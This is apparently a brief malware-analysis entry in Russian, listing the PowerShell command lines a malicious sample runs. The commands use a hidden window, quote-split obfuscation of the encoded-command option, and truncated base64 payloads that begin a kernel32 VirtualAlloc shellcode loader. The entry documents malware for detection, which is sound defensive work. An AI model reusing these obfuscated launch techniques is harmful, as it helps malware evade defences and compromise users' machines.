Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v TlV -;s''v KG e''c;s''v WK ((g''v TlV).value.toString()+(g''v KG).value.toString());powershell (g''v WK).value.toString() ('JABxAFkAIAA9ACAAJwAkAGYARAAgAD0AIAAnACcAWwBEAGwAbABJAG0...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v TlV -;s''v KG e''c;s''v WK ((g''v TlV).value.toString()+(g''v KG).value.toString());powershell (g''v WK).value.toString() ('JABxAFkAIAA9ACAAJwAkAGYARAAgAD0AIAAnACcAWwBEAGwAbABJAG0...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JABxAFkAIAA9ACAAJwAkAGYARAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e''c JABmAEQAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB...